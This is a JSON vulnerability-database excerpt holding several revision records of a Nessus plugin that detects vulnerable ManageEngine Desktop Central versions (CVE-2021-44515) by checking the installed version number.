script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44515\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_desktop_central\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_desktop_central_installed.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Desktop Central\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::get_app_info(app:'ManageEngine Desktop Central', win_local:TRUE);\n\nvar constraints = [\n {'fixed_version':'10.1.2127.18'},\n {'min_version':'10.1.2128.0', 'fixed_version':'10.1.2137.3'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "solution": "Upgrade to ManageEngine Desktop Central 10.1.2127.18 / 10.1.2137.3 or later.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2021-44515", "vpr": {"risk factor": "Critical", "score": "9.6"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-12-03T00:00:00", "vulnerabilityPublicationDate": "2021-12-03T00:00:00", "exploitableWith": []}, "lastseen": "2021-12-13T23:41:31", "differentElements": ["cvss", "cvss3", "modified", "nessusSeverity", "sourceData"], "edition": 6}, {"bulletin": {"id": "MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL", "vendorId": null, "hash": "ea3d83e7683cbaeaa71089cad238980c", "type": "nessus", "bulletinFamily": "scanner", "title": "ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)", "description": "The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior to 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to bypass authentication and execute arbitrary code in the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-12-06T00:00:00", "modified": "2021-12-17T00:00:00", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/155865", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44515", "http://www.nessus.org/u?fa9e3175"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T23:41:55", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "cve", "idList": ["CVE-2021-44515"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-17T23:41:55", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-12-17T23:41:55", "rev": 2}}, "objectVersion": "1.6", "pluginID": "155865", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(155865);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/12/17\");\n\n script_cve_id(\"CVE-2021-44515\");\n script_xref(name:\"IAVA\", value:\"2021-A-0570\");\n\n script_name(english:\"ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java-based web application that is affected by an authentication bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior\nto 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to\nbypass authentication and execute arbitrary code in the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fa9e3175\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Desktop Central 10.1.2127.18 / 10.1.2137.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44515\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_desktop_central\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_desktop_central_installed.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Desktop Central\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::get_app_info(app:'ManageEngine Desktop Central', win_local:TRUE);\n\nvar constraints = [\n {'fixed_version':'10.1.2127.18'},\n {'min_version':'10.1.2128.0', 'fixed_version':'10.1.2137.3'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "solution": "Upgrade to ManageEngine Desktop Central 10.1.2127.18 / 10.1.2137.3 or later.", "nessusSeverity": "Critical", "cvssScoreSource": "CVE-2021-44515", "vpr": {"risk factor": "Critical", "score": "9.6"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-12-03T00:00:00", "vulnerabilityPublicationDate": "2021-12-03T00:00:00", "exploitableWith": []}, "lastseen": "2021-12-17T23:41:55", "differentElements": ["modified", "sourceData"], "edition": 7}, {"bulletin": {"id": "MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL", "vendorId": null, "hash": "a8aaa682885898f9a54c84af534c8728", "type": "nessus", "bulletinFamily": "scanner", "title": "ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)", "description": "The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior to 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to bypass authentication and execute arbitrary code in the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-12-06T00:00:00", "modified": "2021-12-20T00:00:00", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/155865", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?fa9e3175", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44515"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-21T11:36:14", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-44515"]}, {"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}, {"type": "threatpost", "idList": ["THREATPOST:927CAECDA58E6BC3266D14FE340589BB"]}], "modified": "2021-12-21T11:36:14", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-12-21T11:36:14", "rev": 2}}, "objectVersion": "1.6", "pluginID": "155865", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(155865);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/12/20\");\n\n script_cve_id(\"CVE-2021-44515\");\n script_xref(name:\"IAVA\", value:\"2021-A-0570\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n\n script_name(english:\"ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java-based web application that is affected by an authentication bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior\nto 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to\nbypass authentication and execute arbitrary code in the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fa9e3175\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Desktop Central 10.1.2127.18 / 10.1.2137.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44515\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_desktop_central\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_desktop_central_installed.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Desktop Central\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::get_app_info(app:'ManageEngine Desktop Central', win_local:TRUE);\n\nvar constraints = [\n {'fixed_version':'10.1.2127.18'},\n {'min_version':'10.1.2128.0', 'fixed_version':'10.1.2137.3'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "solution": "Upgrade to ManageEngine Desktop Central 10.1.2127.18 / 10.1.2137.3 or later.", "nessusSeverity": "Critical", "cvssScoreSource": "CVE-2021-44515", "vpr": {"risk factor": "Critical", "score": "9.6"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-12-03T00:00:00", "vulnerabilityPublicationDate": "2021-12-03T00:00:00", "exploitableWith": []}, "lastseen": "2021-12-21T11:36:14", "differentElements": ["cpe", "cvss"], "edition": 8}, {"bulletin": {"id": "MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL", "vendorId": null, "hash": "953a9ed873c66d961ee6bc15dff9aa99", "type": "nessus", "bulletinFamily": "scanner", "title": "ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)", "description": "The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior to 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to bypass authentication and execute arbitrary code in the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-12-06T00:00:00", "modified": "2021-12-20T00:00:00", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/155865", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44515", "http://www.nessus.org/u?fa9e3175"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-21T23:36:26", "history": [], "viewCount": 8, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-44515"]}, {"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "cisa", "idList": ["CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:C9AC32BB051B58B7F0F6E0FD2949390C"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "threatpost", "idList": ["THREATPOST:927CAECDA58E6BC3266D14FE340589BB"]}], "modified": "2021-12-21T23:36:26", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-12-21T23:36:26", "rev": 2}}, "objectVersion": "1.6", "pluginID": "155865", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(155865);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/12/20\");\n\n script_cve_id(\"CVE-2021-44515\");\n script_xref(name:\"IAVA\", value:\"2021-A-0570\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n\n script_name(english:\"ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java-based web application that is affected by an authentication bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior\nto 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to\nbypass authentication and execute arbitrary code in the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fa9e3175\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Desktop Central 10.1.2127.18 / 10.1.2137.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44515\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_desktop_central\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_desktop_central_installed.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Desktop Central\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::get_app_info(app:'ManageEngine Desktop Central', win_local:TRUE);\n\nvar constraints = [\n {'fixed_version':'10.1.2127.18'},\n {'min_version':'10.1.2128.0', 'fixed_version':'10.1.2137.3'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "naslFamily": "Windows", "cpe": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:*:*:*:*"], "solution": "Upgrade to ManageEngine Desktop Central 10.1.2127.18 / 10.1.2137.3 or later.", "nessusSeverity": "Critical", "cvssScoreSource": "CVE-2021-44515", "vpr": {"risk factor": "Critical", "score": "9.6"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-12-03T00:00:00", "vulnerabilityPublicationDate": "2021-12-03T00:00:00", "exploitableWith": []}, "lastseen": "2021-12-21T23:36:26", "differentElements": ["cpe", "cvss", "vpr"], "edition": 9}, {"bulletin": {"id": "MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL", "vendorId": null, "hash": "769cf99fbc9d404466adf47587ca50dd", "type": "nessus", "bulletinFamily": "scanner", "title": "ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)", "description": "The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior to 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to bypass authentication and execute arbitrary code in the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-12-06T00:00:00", "modified": "2021-12-20T00:00:00", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/155865", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?fa9e3175", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44515"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-24T23:34:04", "history": [], "viewCount": 8, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-44515"]}, {"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "threatpost", "idList": ["THREATPOST:927CAECDA58E6BC3266D14FE340589BB"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-24T23:34:04", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-12-24T23:34:04", "rev": 2}}, "objectVersion": "1.6", "pluginID": "155865", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(155865);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/12/20\");\n\n script_cve_id(\"CVE-2021-44515\");\n script_xref(name:\"IAVA\", value:\"2021-A-0570\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n\n script_name(english:\"ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java-based web application that is affected by an authentication bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior\nto 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to\nbypass authentication and execute arbitrary code in the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.manageengi
